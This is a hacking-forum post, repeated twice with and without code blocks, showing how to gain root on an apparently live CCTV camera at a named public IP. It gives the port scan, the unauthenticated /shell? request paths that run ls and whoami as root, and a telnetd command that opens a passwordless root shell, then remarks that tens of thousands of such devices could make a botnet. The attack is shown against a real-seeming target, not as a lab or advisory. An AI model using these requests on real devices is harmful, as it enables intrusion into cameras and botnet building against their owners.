A joke, honestly. Lets just take a look at over 30000 vulnerable CCTV cameras.
Here, lets take a little look. By the way, don't ban me from forum for showing people how many vulnerable devices there are, I am not targeting the forum or any members who use the forum, or used it in the past. I am simply just showing all of you.
Target: 82.38.41.66
ISP: Virgin Media (although this isn't really relevant, lets just include it anyway for memez)
Results from a port scan
I'm surprised port 23 wasn't open.
Okay so lets connect to 82.38.41.66:80 - This is what we see:
Alright well... Lets just try adding /moo to the request. So this gets returned to us:
Okay.. So lets try something else, how about /shell?cd%20/;%20ls - This was returned:
So we have shell, plus was returned this on /shell?whoami
Yeah, we can do a lot with this. Lets use the remote web shell to start a telnet daemon that's already logged in. If I execute 'ls /usr/sbin' on the remote web shell I can see that telnetd is there, so I could run '/usr/sbin/telnetd -l/bin/sh -p 69' but this isn't really going to be useful to me since I have a remote web shell to play around with anyway.
After if we find a writeable directory which I found in /root/rec (not this specifically). There is a lot more I can do wit this but it's pointless writing anymore, I'm sure some of you will be able to understand what this is and what you could do with it (being there is tens of thousands), you could start a very big botnet, but I am not here to encourage that.
Thanks for reading
- malek
Here, lets take a little look. By the way, don't ban me from forum for showing people how many vulnerable devices there are, I am not targeting the forum or any members who use the forum, or used it in the past. I am simply just showing all of you.
Target: 82.38.41.66
ISP: Virgin Media (although this isn't really relevant, lets just include it anyway for memez)
Results from a port scan
Code:
PORT STATE SERVICE REASON
80/tcp open http syn-ack ttl 57
Okay so lets connect to 82.38.41.66:80 - This is what we see:
Code:
(__)
(oo)
/------\/
/ | ||
* /\---/\
~~ ~~
...."Have you mooed today?"...
Okay.. So lets try something else, how about /shell?cd%20/;%20ls - This was returned:
Code:
a.out
a2.out
bin
dev
etc
lib
linuxrc
media
mnt
nfsroot
proc
root
sbin
sys
tmp
usr
var
So we have shell, plus was returned this on /shell?whoami
Code:
root
After if we find a writeable directory which I found in /root/rec (not this specifically). There is a lot more I can do wit this but it's pointless writing anymore, I'm sure some of you will be able to understand what this is and what you could do with it (being there is tens of thousands), you could start a very big botnet, but I am not here to encourage that.
Thanks for reading
- malek
